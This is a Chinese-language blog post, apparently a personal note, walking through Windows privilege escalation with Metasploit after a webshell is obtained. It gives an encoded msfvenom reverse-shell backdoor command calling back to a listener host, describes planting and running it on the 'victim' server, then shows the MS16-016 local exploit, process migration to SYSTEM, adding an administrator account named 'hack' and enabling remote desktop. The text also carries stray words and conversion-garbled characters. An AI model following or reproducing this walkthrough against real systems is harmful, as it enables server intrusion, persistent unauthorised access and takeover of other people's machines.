用MSF進行提權

在WEB滲透中當咱們拿到webshell了,咱們能夠試試用MSF(metasploit)來進行提權,在MSF裏meterpreter很強大的!web

咱們先用msfvenom生成一個EXE的木馬後門。shell

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe

而後在到MSF根據剛纔配置的木馬後門進行監聽...windows

而後在把木立刻傳到服務器(受害者)的機器裏,必須上傳到可讀可寫的目錄下哦,服務器

好比這裏我吧abc.exe上傳到了C:\users\leak\desktop\目錄下,session

abc.exe就是我剛纔生成的後門。tcp

而後在執行咱們的後門,能夠看見MSF彈回了一個session 1(會話鏈接)。ui

說明咱們後門程序成功執行起來了,固然你也能夠在webshell執行的,spa

但必須的有一點執行的權限哦。3d

getuid //能夠看見咱們的權限很低的,通常都是user權限的,code

但也遇到過某些服務器執行後就直接是system最高權限。像這種咱們就直接加用戶啦。

這裏咱們是user權限,咱們要把它提高到system權限。Windows最高權限。

接着咱們輸入命令

background     //把你當前的metasploit shell轉爲後臺執行。

search ms16  // 搜索關鍵字相關的漏洞

.....而後我選擇了MS16-016這個漏洞在進行提權

use exploit/windows/local/ms16_016_webdav //  選擇漏洞

show options  //查看漏洞裏邊要設置的參數

能夠看見只有一個SESSION參數要設置 

set  SESSION 1 // 設置會剛纔咱們後門鏈接的ID號 1

exploit //執行提權...

能夠看見成功的吧漏洞利用到了PID爲692的進程中...

雖然提權成功了 但你getuid下仍是看見的是user權限

 

ps一下查看進程

根據剛纔的提示找到PID 692的進程

能夠看見確實是system權限

因此咱們還要用到migrate 命令 //遷移到一個指定的進程ID。

migrate 692  //

在getuid下能夠看見爲system權限啦

提權成功了

既然有了system權限 那咱們在添加帳號hack

添加爲管理員組

用Nmap掃下並無開啓遠程登錄3389

run getgui -e  //開啓目標主機3389  貌似這條MSF命令只對2003的系統有效 執行幾回都沒成功 

因此就用cmd命令開了3389端口

提權成功,登陸服務器。。。。

簡單的作個筆記,記性很差。

相關文章
相關標籤/搜索